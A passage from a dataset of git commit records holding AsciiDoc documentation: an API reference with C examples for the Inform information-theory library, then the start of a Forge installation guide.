size_t n, size_t m, int b, size_t k, double *si,\n inform_error *err);\n----\n[horizontal]\nHeader:: `inform\/separable_info.h`\n****\n\n[[transfer-entropy]]\n== Transfer Entropy\n\n****\n[[inform_transfer_entropy]]\n[source,c]\n----\ndouble inform_transfer_entropy(int const *src, int const *dst,\n int const *back, size_t l, size_t n, size_t m, int b, size_t k,\n inform_error *err);\n----\n[horizontal]\nHeader:: `inform\/transfer_entropy.h`\n****\n\n****\n[[inform_local_transfer_entropy]]\n[source,c]\n----\ndouble *inform_local_transfer_entropy(int const *src, int const *dst,\n int const *back, size_t l, size_t n, size_t m, int b, size_t k,\n double *te, inform_error *err);\n----\n[horizontal]\nHeader:: `inform\/transfer_entropy.h`\n****\n","old_contents":"[[time-series-measures]]\n= Time Series Measures\n\nThe original purpose of *Inform* was to analyze time series data. This explains why most of\n*Inform*'s functionality resides in functions specifically optimized for analyzing time\nseries. The API was designed to be easy to use in C or {cpp}, or to be wrapped in a\nhigher-level language, e.g. https:\/\/elife-asu.github.io\/PyInform[Python]. This means that we\navoided some of the \"niceties\" of C, such as extensive use of macros and other generic\natrocities, in favor of wrappability. Keep this in mind as you learn the API.\n\nMany information measures have \"local\" variants which compute a time series of point-wise\nvalues. These local variants have names similar to their averaged or global counterparts,\ne.g <<inform_active_info,inform_active_info>> and\n<<inform_local_active_info,inform_local_active_info>>. We have been meticulous in ensuring\nthat function and parameter names are consistent across measures. If you notice some\ninconsistency, please https:\/\/github.com\/elife-asu\/inform\/issue[report it as an issue].\n\n[[time-series-notation]]\n== Notation\n\nThroughout the discussion of time series measures, we will try to use a consistent notation.\nWe will denote random variables as stem:[X,Y,\\ldots], and let stem:[x_i,y_i,\\ldots]\nrepresent the stem:[i]-th time step of a time series drawn from the associated random\nvariable. Many of the measures consider stem:[k]-histories (a.k.a stem:[k]-blocks) of the\ntime series, e.g. stem:[x_i^{(k)} = \\left\\{x_{i-k+1}, x_{i-k+2},\\ldots,x_i\\right\\}].\n\nWhen denoting probability distributions, we will only make the random variable explicit in\nsituations where the notation is ambiguous. We will typically write stem:[p(x_i)],\nstem:[p(x_i^{(k)})], and stem:[p(x_i^{(k)}, x_{i+1})] to denote the empirical probability\nof observing the stem:[x_i] state, the stem:[x_i^{(k)}] stem:[k]-history, and the joint\nprobability of observing stem:[\\left(x_i^{(k)}, x_{i+1}\\right)].\n\n*Please report any notational ambiguities as an\nhttps:\/\/github.com\/elife-asu\/inform\/issue[issue].*\n\n[[time-series-detail]]\n== Implementation Details\n\n=== The Base: States and Logarithms\nThe word \"base\" has two different meanings in the context of information measures on time\nseries. It could refer to the base of the time series itself, that is the number of unique\nstates in the time series. For example, the time series stem:[\\{0,2,1,0,0\\}] is a base-3\ntime series. On the other hand, it could refer to the base of the logarithm used in\ncomputing the information content of the inferred probability distributions. The problem is\nthat these two meanings clash. The base of the time series affects the range of values the\nmeasure can produce, and the base of the logarithm represents a rescaling of those values.\n\nIn this library we deal with this by *always* using base-2 logarithms, and having the user\nspecify the base of the time series \u2014 don't worry, we <<error-handling, set an error>> if\nthe provided base doesn't make sense. All of this ensures that the library is a simple as\nreasonably possible.\n\n=== Multiple Initial Conditions\nYou generally need *a lot* of data to infer a probability distribution. An experimentalist\nor simulator might then collect data over multiple trials or initial conditions. Most of\n*Inform*'s time series measures allow the user to pass in a two-dimensional, rectangular\narray which each row representing a time series from a different initial condition. From\nthis the probability distributions are inferred, and the desired value is calculated. This\nhas the downside of requiring that the user store all of the data in memory, but it has the\nadvantage of being fast and simple. Trade-offs, man...\n\nA subsequent release, https:\/\/github.com\/elife-asu\/inform\/milestone\/3[likely v1.1.0], will\nallows the initial conditions to have time series of different lengths and will provide\naccumulator implementations of all of these measures that will let the incrementally\nconstruct the distributions. This will lift some of the memory burden at the expense of\nruntime performance.\n\n=== Calling Conventions\nAll of the of the time series functions described in this section use the same basic calling\nconventions and use the same (or similar) argument names were possible.\n\n|===\n| Argument Name | Description\n\n| `series`\n| A 2-D or 3-D, finite-state time series in contiguous, row-major form\n\n| `l`\n| The number of \"sources\" or variables in a 3-D time series\n\n| `n`\n| The number of initial conditions per \"source\"\n\n| `m`\n| The number of time steps per \"source\"\n\n| `b`\n| The base of the time series\n\n| `k`\n| The length history length\n\n| `err`\n| An error argument\n|===\n\nAverage measures generally return a double-precision, floating-point value while local\nvariants return a pointer to an appropriately shaped, contiguous array. Local measures\naccept an argument, often named after the function (e.g. local active information takes an\n`ai` argument), which is used to store the computed local values. If that argument is NULL,\nthen the function allocates an array.\n\nWe will try to note any deviations from these conventions.\n\n[[active-info]]\n== Active Information\n\nActive information (AI) was introduced in <<Lizier2012>> to quantify information storage in\ndistributed computations. Active information is defined in terms of a temporally local\nvariant\n\n[stem]\n++++\na_{X,i}(k) = \\log_2{\\frac{p(x_i^{(k)}, x_{i+1})}{p(x_i^{(k)})p(x_{i+1})}}.\n++++\n\nwhere the probabilities are constructed empirically from the _entire_ time series. From the\nlocal variant, the temporally global active information is defined as\n\n[stem]\n++++\nA_X(k) = \\langle a_{X,i}(k) \\rangle_i\n = \\sum_{x_i^{(k)},x_{i+1}} p(x_i^{(k)},x_{i+1}) \\log_2{\\frac{p(x_i^{(k)}, x_{i+1})}{p(x_i^{(k)})p(x_{i+1})}}.\n++++\n\nStrictly speaking, the local and average active information are defined as\n\n[stem]\n++++\na_{X,i} = \\lim_{k\\rightarrow \\infty}a_{X,i}(k)\n\\qquad \\textrm{and} \\qquad\nA_X = \\lim_{k\\rightarrow \\infty}A_X(k),\n++++\n\nbut we do not provide limiting functionality in this library\n(https:\/\/github.com\/elife-asu\/issues\/24[yet]!).\n\n****\n[[inform_active_info]]\n[source,c]\n----\ndouble inform_active_info(int const *series, size_t n, size_t m,\n int b, size_t k, inform_error *err);\n----\nCompute the average active information with a history length `k`.\n\n*Examples:*\n\nOne initial condition:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[9] = {0,0,1,1,1,1,0,0,0};\ndouble ai = inform_active_info(series, 1, 9, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ ai ~ 0.305958\n----\n\nTwo initial conditions:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[18] = {0,0,1,1,1,1,0,0,0,\n 1,0,0,1,0,0,1,0,0};\ndouble ai = inform_active_info(series, 2, 9, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ ai ~ 0.359879\n----\n****\n\n****\n[[inform_local_active_info]]\n[source,c]\n----\ndouble *inform_local_active_info(int const *series, size_t n, size_t m,\n int b, size_t k, double *ai, inform_error *err);\n----\nCompute the local active information with a history length `k`.\n\n*Examples:*\n\nOne initial condition:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[9] = {0,0,1,1,1,1,0,0,0};\ndouble *ai = inform_local_active_info(series, 1, 9, 2, 2, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ ai ~ {-0.193, 0.807, 0.222, 0.222, -0.363, 1.222, 0.222}\nfree(ai);\n----\n\nTwo initial conditions:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[18] = {0,0,1,1,1,1,0,0,0,\n 1,0,0,1,0,0,1,0,0};\ndouble ai[14];\ninform_local_active_info(series, 2, 9, 2, 2, ai, &err);\nassert(inform_succeeded(&err));\n\/\/ ai ~ { 0.807, -0.363, 0.637, 0.637, -0.778, 0.807, -1.193,\n\/\/ 0.807, 0.807, 0.222, 0.807, 0.807, 0.222, 0.807 }\n\n\/\/ no need to free since `ai` was statically allocated in this scope\n\/\/ free(ai);\n----\n****\n\n[[block-entropy]]\n== Block Entropy\nBlock entropy, also known as stem:[N]-gram entropy <<Shannon1948>>, is the standard Shannon\nentropy of the stem:[k]-histories of a time series:\n[stem]\n++++\nH(X^{(k)}) = -\\sum_{x_i^{(k)}} p(x_i^{(k)}) \\log_2{p(x_i^{(k)})}\n++++\nwhich reduces to the traditional Shannon entropy for stem:[k=1].\n\n****\n[[inform_block_entropy]]\n[source,c]\n----\ndouble inform_block_entropy(int const *series, size_t n, size_t m,\n int b, size_t k, inform_error *err);\n----\nCompute the average block entropy of a time series with block size `k`.\n\n*Examples:*\n\nOne initial condition:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[9] = {0,0,1,1,1,1,0,0,0};\n\n\/\/ k = 1\ndouble h = inform_block_entropy(series, 1, 9, 2, 1, &err);\nassert(inform_succeeded(&err));\n\/\/ h ~ 0.991076\n\n\/\/ k = 2\nh = inform_block_entropy(series, 1, 9, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ h ~ 1.811278\n----\n\nTwo initial conditions:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[18] = {0,0,1,1,1,1,0,0,0,\n 1,0,0,1,0,0,1,0,0};\ndouble h = inform_active_info(series, 2, 9, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ h ~ 1.936278\n----\n****\n\n****\n[[inform_local_block_entropy]]\n[source,c]\n----\ndouble *inform_local_block_entropy(int const *series, size_t n,\n size_t m, int b, size_t k, double *ent, inform_error *err);\n----\nCompute the local block entropy of a time series with block size `k`.\n\n*Examples:*\n\nOne initial condition:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[9] = {0,0,1,1,1,1,0,0,0};\n\n\/\/ k == 1\ndouble *h = inform_local_block_entropy(series, 1, 9, 2, 1, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ h ~ { 0.848, 0.848, 1.170, 1.170, 1.170, 1.170, 0.848, 0.848, 0.848 }\n\n\/\/ k == 2\ndouble *h = inform_local_block_entropy(series, 1, 9, 2, 2, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ h ~ { 1.415, 3.000, 1.415, 1.415, 1.415, 3.000, 1.415, 1.415 }\n\nfree(ai);\n----\n\nTwo initial conditions:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[18] = {0,0,1,1,1,1,0,0,0,\n 1,0,0,1,0,0,1,0,0};\ndouble h[16];\ninform_local_block_entropy(series, 2, 9, 2, 2, h, &err);\nassert(inform_succeeded(&err));\n\/\/ h ~ { 1.415, 2.415, 2.415, 2.415, 2.415, 2.000, 1.415, 1.415,\n\/\/ 2.000, 1.415, 2.415, 2.000, 1.415, 2.415, 2.000, 1.415 }\n\n\/\/ no need to free since `h` was statically allocated in this scope\n\/\/ free(h);\n----\n****\n\n[[conditional-entropy]]\n== Conditional Entropy\nhttps:\/\/en.wikipedia.org\/wiki\/Conditional_entropy[Conditional entropy] is a measure of the\namount of information required to describe a random variable stem:[Y] given knowledge of\nanother random variable stem:[X]. When applied to time series, two time series are used to\nconstruct the empirical distributions, and <<inform_shannon_ce,inform_shannon_ce>> can be\napplied to yield\n[stem]\n++++\nH(Y|X) = - \\sum_{x_i,y_i} p(x_i,y_i) \\log_2{p(y_i|x_i)}.\n++++\nThis can be viewed as the time-average of the local conditional entropy\n[stem]\n++++\nh_i(Y|X) = -\\log_2{p(y_i|x_i)}.\n++++\nSee <<Cover1991>> for more information.\n\n****\n[[inform_conditional_entropy]]\n[source,c]\n----\ndouble inform_conditional_entropy(int const *xs, int const *ys,\n size_t n, int bx, int by, inform_error *err);\n----\nCompute the conditional entropy between two time series.\n\nThis function expects the *condition* to be the first argument, `xs`. It is expected that\neach time series be the same length `n`, but may have different bases `bx` and `by`.\n\n*Examples:*\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[20] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1};\nint const ys[20] = {0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1};\n\ndouble ce = inform_conditional_entropy(xs, ys, 20, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ ce == 0.597107\n\nce = inform_conditional_entropy(ys, xs, 20, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ ce == 0.507757\n----\n****\n\n****\n[[inform_local_conditional_entropy]]\n[source,c]\n----\ndouble *inform_local_conditional_entropy(int const *xs, int const *ys,\n size_t n, int bx, int by, double *mi, inform_error *err);\n----\nCompute the local conditional entropy between two time series.\n\nThis function expects the *condition* to be the first argument, `xs`. It is expected that\neach time series be the same length `n`, but may have different bases `bx` and `by`.\n\n*Examples:*\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[20] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1};\nint const ys[20] = {0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1};\n\ndouble *ce = inform_local_conditional_entropy(xs, ys, 20, 2, 2, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ ce == { 3.00, 3.00, 0.19, 0.19, 0.19, 0.19, 0.19, 0.19, 0.19, 0.19,\n\/\/ 0.19, 0.19, 0.19, 0.19, 0.19, 0.19, 0.42, 0.42, 0.42, 2.00 }\n\ninform_local_conditional_entropy(ys, xs, 20, 2, 2, ce, &err);\nassert(inform_succeeded(&err));\n\/\/ ce == { 1.32, 1.32, 0.10, 0.10, 0.10, 0.10, 0.10, 0.10, 0.10, 0.10,\n\/\/ 0.10, 0.10, 0.10, 0.10, 0.10, 0.10, 0.74, 0.74, 0.74, 3.91 }\n\nfree(ce);\n----\n****\n\n[[cross-entropy]]\n== Cross Entropy\nhttps:\/\/en.wikipedia.org\/wiki\/Cross_entropy[Cross entropy] between two distributions\nstem:[p_X] and stem:[q_X] measures the amount of information needed to identify events\nusing a coding scheme optimized for stem:[q_X] when stem:[p_X] is the \"real\" distributions\nover stem:[X].\n[stem]\n++++\nH(p,q) = -\\sum_{x} p(x) \\log_2{q(x)}\n++++\nCross entropy's local variant is equivalent to the self-information of stem:[q_X], and as\nsuch is implemented by <<inform_local_block_entropy,inform_local_block_entropy>>.\n\nSee <<Cover1991>> for more details.\n****\n[[inform_cross_entropy]]\n[source,c]\n----\ndouble inform_cross_entropy(int const *ps, int const *qs, size_t n,\n int b, inform_error *err);\n----\nCompute the cross entropy between the \"true\" and \"unnatural\" distributions stem:[p_X] and\nstem:[q_X] from associated time series `ps` and `qs`, respectively.\n\n*Examples:*\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const ps[10] = {0,1,1,0,1,0,0,1,0,0};\nint const qs[10] = {0,0,0,0,0,1,1,0,0,1};\n\ndouble ce = inform_cross_entropy(ps, qs, 10, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ ce == 1.003530\n\nce = inform_cross_entropy(qs, ps, 10, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ ce == 0.912454\n----\n****\n\n[[effective-information]]\n== Effective Information\n\n****\n[[inform_effective_info]]\n[source,c]\n----\ndouble inform_effective_info(double const *tpm, double const *inter,\n size_t n, inform_error *err);\n----\n****\n\n[[entropy-rate]]\n== Entropy Rate\nhttps:\/\/en.wikipedia.org\/wiki\/Entropy_rate[Entropy rate] quantifies the amount of\ninformation needed to describe the next state of stem:[X] given observations of\nstem:[X^{(k)}]. In other wrods, it is the entropy of the time series conditioned on the\nstem:[k]-histories. The local entropy rate\n[stem]\n++++\nh_{X,i}(k) = \\log_2{\\frac{p(x_i^{(k)}, x_{i+1})}{p(x_i^{(k)})}}.\n++++\ncan be averaged to obtain the global entropy rate\n[stem]\n++++\nH_X(k) = \\langle h_{X,i}(k) \\rangle_i\n = \\sum_{x_i^{(k)},x_{i+1}} p(x_i^{(k)},x_{i+1}) \\log_2{\\frac{p(x_i^{(k)}, x_{i+1})}{p(x_i^{(k)})}}.\n++++\nMuch as with <<active-info, active information>>, the local and average entropy rates are\nformally obtained in the limit\n[stem]\n++++\nh_{X,i} = \\lim_{k\\rightarrow \\infty}h_{X,i}(k)\n\\qquad \\textrm{and} \\qquad\nH_X = \\lim_{k\\rightarrow \\infty}H_X(k),\n++++\n\nbut we do not provide limiting functionality in this library\n(https:\/\/github.com\/elife-asu\/issues\/24[yet]!).\n\nSee <<Cover1991>> for more details.\n\n****\n[[inform_entropy_rate]]\n[source,c]\n----\ndouble inform_entropy_rate(int const *series, size_t n, size_t m,\n int b, size_t k, inform_error *err);\n----\nCompute the average entropy rate with a history length `k`.\n\n*Examples:*\n\nOne initial condition:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[9] = {0,0,1,1,1,1,0,0,0};\ndouble er = inform_entropy_rate(series, 1, 9, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ er ~ 0.679270\n----\n\nTwo initial conditions:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[18] = {0,0,1,1,1,1,0,0,0,\n 1,0,0,1,0,0,1,0,0};\ndouble er = inform_entropy_rate(series, 2, 9, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ er ~ 0.625349\n----\n****\n\n****\n[[inform_local_entropy_rate]]\n[source,c]\n----\ndouble *inform_local_entropy_rate(int const *series, size_t n,\n size_t m, int b, size_t k, double *er, inform_error *err);\n----\nCompute the local entropy rate with a history length `k`.\n\n*Examples:*\n\nOne initial condition:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[9] = {0,0,1,1,1,1,0,0,0};\ndouble *er = inform_local_entropy_rate(series, 1, 9, 2, 2, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ er ~ { 1.000, 0.000, 0.585, 0.585, 1.585, 0.000, 1.000 }\nfree(er);\n----\n\nTwo initial conditions:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[18] = {0,0,1,1,1,1,0,0,0,\n 1,0,0,1,0,0,1,0,0};\ndouble er[14];\ninform_local_entropy_rate(series, 2, 9, 2, 2, er, &err);\nassert(inform_succeeded(&err));\n\/\/ er ~ { 0.415, 1.585, 0.585, 0.585, 1.585, 0.000, 2.000,\n\/\/ 0.000, 0.415, 0.585, 0.000, 0.415, 0.585, 0.000 }\n\n\/\/ no need to free since `er` was statically allocated in this scope\n\/\/ free(er);\n----\n****\n\n[[excess-entropy]]\n== Excess Entropy\n\n****\n[[inform_excess_entropy]]\n[source,c]\n----\ndouble inform_excess_entropy(int const *series, size_t n, size_t m,\n int b, size_t k, inform_error *err);\n----\n****\n\n****\n[[inform_local_excess_entropy]]\n[source,c]\n----\ndouble *inform_local_excess_entropy(int const *series, size_t n,\n size_t m, int b, size_t k, double *ee, inform_error *err);\n----\n****\n\n[[information-flow]]\n== Information Flow\n\n****\n[[inform_information_flow]]\n[source,c]\n----\ndouble inform_information_flow(int const *src, int const *dst,\n int const *back, size_t l_src, size_t l_dst, size_t l_back,\n size_t n, size_t m, int b, inform_error *err);\n----\n****\n\n[[evidence-of-integration]]\n== Evidence Of Integration\n\n****\n[[inform_integration_evidence]]\n[source,c]\n----\ndouble *inform_integration_evidence(int const *series, size_t l,\n size_t n, int const *b, double *evidence, inform_error *err);\n----\n****\n\n****\n[[inform_integration_evidence_part]]\n[source,c]\n----\ndouble *inform_integration_evidence_part(int const *series, size_t l,\n size_t n, int const *b, size_t const *parts, size_t nparts,\n double *evidence, inform_error *err);\n----\n****\n\n[[mutual-information]]\n== Mutual Information\nhttps:\/\/en.wikipedia.org\/wiki\/Mutual_information[Mutual information] (MI) is a measure of\nthe amount of mutual dependence between at least two random variables. Locally, MI is\ndefined as\n[stem]\n++++\ni_i(X_1,\\ldots,X_l) = \\frac{p(x_{1,i},\\ldots,x_{l,i})}{p(x_{1,i})\\ldots p(x_{l,i})}.\n++++\nThe mutual information is then just the time average of stem:[i_i(X_1,\\ldots,X_l)]:\n[stem]\n++++\nI(X_1,\\ldots,X_l) =\n \\sum_{x_{1,i},\\ldots,x_{l,i}} p(x_{1,i},\\ldots,x_{l,i}) \\frac{p(x_{1,i},\\ldots,x_{l,i})}{p(x_{1,i})\\ldots p(x_{l,i})}.\n++++\nSee <<Cover1991>> for more details.\n\n****\n[[inform_mutual_info]]\n[source,c]\n----\ndouble inform_mutual_info(int const *series, size_t l, size_t n,\n int const *b, inform_error *err);\n----\nCompute the mutual information between two or more time series.\n\nFor this function, `l` is the number of random variables, and `n` is the length of each\nvariable's time series. Each variable can have a different base, so `b` is an array of\nlength `l`.\n\n*Examples:*\n\nTwo variables:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[40] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1, \/\/ var 1\n 0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1 \/\/ var 2};\n\ndouble mi = inform_mutual_info(xs, 2, 20, (int[2]){2,2}, &err);\nassert(inform_succeeded(&err));\n\/\/ mi == 0.214171\n----\n\nThree variables:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[60] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1, \/\/ var 1\n 0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1, \/\/ var 2\n 1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1, \/\/ var 3};\n\ndouble mi = inform_mutual_info(xs, 3, 20, (int[3]){2,2,2}, &err);\nassert(inform_succeeded(&err));\n\/\/ mi == 1.095462\n----\n****\n\n****\n[[inform_local_mutual_info]]\n[source,c]\n----\ndouble *inform_local_mutual_info(int const *series, size_t l, size_t n,\n int const *b, double *mi, inform_error *err);\n----\nCompute the local mutual information between two or more time series.\n\nFor this function, `l` is the number of random variables, and `n` is the length of each\nvariable's time series. Each variable can have a different base, so `b` is an array of\nlength `l`.\n\n*Examples:*\n\nTwo variables:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[40] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1, \/\/ var 1\n 0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1 \/\/ var 2};\n\ndouble *mi = inform_local_mutual_info(xs, 2, 20, (int[2]){2,2}, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ mi ~ { -1.000, -1.000, 0.222, 0.222, 0.222, 0.222, 0.222, 0.222,\n\/\/ 0.222, 0.222, 0.222, 0.222, 0.222, 0.222, 0.222, 0.222,\n\/\/ 1.585, 1.585, 1.585, -1.585 }\nfree(mi);\n----\n\nThree variables:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[60] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1, \/\/ var 1\n 0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1, \/\/ var 2\n 1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1, \/\/ var 3};\n\n\ndouble *mi = inform_local_mutual_info(xs, 3, 20, (int[3]){2,2,2}, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ mi ~ { 0.737, 0.737, 0.737, 0.737, 0.737, 0.737, 0.737, 0.737,\n\/\/ 0.737, 0.737, 0.737, 0.737, 0.737, 0.737, 0.737, 0.737,\n\/\/ 3.322, 3.322, 0.322, 0.152 }\nfree(mi);\n----\n****\n\n[[partial-information-decomposition]]\n== Partial Information Decomposition\n\n****\n[[inform_pid_source]]\n[source,c]\n----\ntypedef struct inform_pid_source\n{\n size_t *name;\n struct inform_pid_source **above;\n struct inform_pid_source **below;\n size_t size, n_above, n_below;\n double imin;\n double pi;\n} inform_pid_source;\n----\n****\n\n****\n[[inform_pid_lattice]]\n[source,c]\n----\ntypedef struct inform_pid_lattice\n{\n inform_pid_source **sources;\n inform_pid_source *top;\n inform_pid_source *bottom;\n size_t size;\n} inform_pid_lattice;\n----\n****\n\n****\n[[inform_pid_lattice_free]]\n[source,c]\n----\nvoid inform_pid_lattice_free(inform_pid_lattice *l);\n----\n****\n\n****\n[[inform_pid]]\n[source,c]\n----\ninform_pid_lattice *inform_pid(int const *stimulus,\n int const *responses, size_t l, size_t n, int bs,\n int const *br, inform_error *err);\n----\n****\n\n[[predictive-information]]\n== Predictive Information\n\n****\n[[inform_predictive_info]]\n[source,c]\n----\ndouble inform_predictive_info(int const *series, size_t n, size_t m,\n int b, size_t kpast, size_t kfuture, inform_error *err);\n----\n****\n\n****\n[[inform_local_predictive_info]]\n[source,c]\n----\ndouble *inform_local_predictive_info(int const *series, size_t n,\n size_t m, int b, size_t kpast, size_t kfuture, double *pi,\n inform_error *err);\n----\n****\n\n[[relative-entropy]]\n== Relative Entropy\nhttps:\/\/en.wikipedia.org\/wiki\/Kullback%E2%80%93Leibler_divergence[Relative entropy], also\nknown as the Kullback-Leibler divergence, measures the amount of information gained in\nswitching from a prior distribution stem:[q_X] to a posterior distribution stem:[p_X] over\n_the same support_:\n[stem]\n++++\nD_{KL}(p||q) = \\sum_{x_i} p(x_i) \\log_2{\\frac{p(x_i)}{q(x_i)}}.\n++++\nThe local counterpart is\n[stem]\n++++\nd_{KL,i}(p||q) = log_2{\\frac{p(x_i)}{q(x_i)}}.\n++++\nNote that the average in moving from the local to the non-local relative entropy is taken\nover the posterior distribution.\n\nSee <<Kullback1951>> and <<Cover1991>> for more information.\n\n****\n[[inform_relative_entropy]]\n[source,c]\n----\ndouble inform_relative_entropy(int const *xs, int const *ys, size_t n,\n int b, inform_error *err);\n----\nCompute the relative entropy between time series drawn from posterior and prior\ndistributions, here `xs` and `ys` respectively.\n\n*Examples:*\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[10] = {0,1,0,0,0,0,0,0,0,1};\nint const ys[10] = {0,1,1,1,1,0,0,1,0,0};\n\ndouble re = inform_relative_entropy(xs, ys, 10, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ re == 0.278072\n\nre = inform_relative_entropy(ys, xs, 10, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ re == 0.321928\n----\n****\n\n****\n[[inform_local_relative_entropy]]\n[source,c]\n----\ndouble *inform_local_relative_entropy(int const *xs, int const *ys,\n size_t n, int b, double *re, inform_error *err);\n----\n\n*Examples:*\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[10] = {0,1,0,0,0,0,0,0,0,1};\nint const ys[10] = {0,1,1,1,1,0,0,1,0,0};\n\ndouble *re = inform_local_relative_entropy(xs, ys, 10, 2, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ re ~ { 0.678, -1.322, 0.678, 0.678, 0.678, 0.678, 0.678,\n\/\/ 0.678, 0.678, -1.322 };\n\ninform_local_relative_entropy(ys, xs, 10, 2, re, &err);\nassert(inform_succeeded(&err));\n\/\/ re ~ { -0.678, 1.322, 1.322, 1.322, 1.322, -0.678, -0.678, 1.322,\n\/\/ -0.678, -0.678 }\n\nfree(re);\n----\n****\n\n[[separable-information]]\n== Separable Information\n\n****\n[[inform_separable_info]]\n[source,c]\n----\ndouble inform_separable_info(int const *srcs, int const *dest,\n size_t l, size_t n, size_t m, int b, size_t k,\n inform_error *err);\n----\n****\n\n****\n[[inform_local_separable_info]]\n[source,c]\n----\ndouble *inform_local_separable_info(int const *srcs, int const *dest,\n size_t l, size_t n, size_t m, int b, size_t k, double *si,\n inform_error *err);\n----\n****\n\n[[transfer-entropy]]\n== Transfer Entropy\n\n****\n[[inform_transfer_entropy]]\n[source,c]\n----\ndouble inform_transfer_entropy(int const *src, int const *dst,\n int const *back, size_t l, size_t n, size_t m, int b, size_t k,\n inform_error *err);\n----\n****\n\n****\n[[inform_local_transfer_entropy]]\n[source,c]\n----\ndouble *inform_local_transfer_entropy(int const *src, int const *dst,\n int const *back, size_t l, size_t n, size_t m, int b, size_t k,\n double *te, inform_error *err);\n----\n****\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"d067c610710d617777e6f1ca0a87232413609dc9","subject":"Update Installation.asciidoc","message":"Update Installation.asciidoc","repos":"forge\/docs,agoncal\/docs,forge\/docs,luiz158\/docs,luiz158\/docs,agoncal\/docs","old_file":"get_started\/Installation.asciidoc","new_file":"get_started\/Installation.asciidoc","new_contents":"== Installing Forge\n\nInstalling Forge is a relatively short process, and this guide will take you through the fundamentals (providing links to external materials if required) however, if you encounter any issues with this process, please ask in the Forge Users mailing list, or if you think something is wrong with this guide, report a defect to the team.\n\n=== Install a Forge Distribution\n\nFollow these steps to install a Forge distribution:\n\n*1. Ensure that you have already installed http:\/\/www.oracle.com\/technetwork\/java\/javase\/downloads\/index.html[a Java 7+ JDK].* We recommend installing JDK 8.\n\n*2. https:\/\/repository.jboss.org\/nexus\/service\/local\/artifact\/maven\/redirect?r=releases&g=org.jboss.forge&a=forge-distribution&v=LATEST&e=zip&c=offline[Download] and Un-zip Forge into a folder on your hard-disk, this folder will be your `FORGE_HOME`*\n\n*3. Add `$FORGE_HOME\/bin` to your path (http:\/\/www.google.com\/search?q=windows+edit+path[windows], http:\/\/www.google.com\/search?q=linux+set+path[linux], http:\/\/www.google.com\/search?q=mac+osx+edit+path[mac osx])*\n\nOn Unix based operating systems, this typically means editing your `~\/.bashrc` or `~\/.profile`; you will need to the following entries:\n\n[source]\n----\nexport FORGE_HOME=~\/forge\/\nexport PATH=$PATH:$FORGE_HOME\/bin\n----\n\nWhile on Windows, you will need to right-click on open the \"Control Panel\", then click \"System Properties\", open the \"Advanced\" tab, then click \"Environment Variables\" and add these two entries visually. It is recommended to set User variables for Forge, unless you have placed the unzipped distribution in a folder where all users can access it.\n\n****\nYou may also simply create a shortcut to `bin\/forge` (Unix,) or `bin\\forge.bat` (Windows,) and place it on your Desktop.\n****\n\n*4. Consider installing http:\/\/git-scm.com\/[Git] and http:\/\/maven.apache.org\/[Maven 3.1+] (both optional)*\n\n*5. Open a command prompt and run `forge` - located in $FORGE_HOME\/bin\/ (if you are on Windows, you will need to run `forge.bat` unless using a Unix-style terminal)*\n\n[source]\n----\nlocalhost:~ $ forge\n[~] 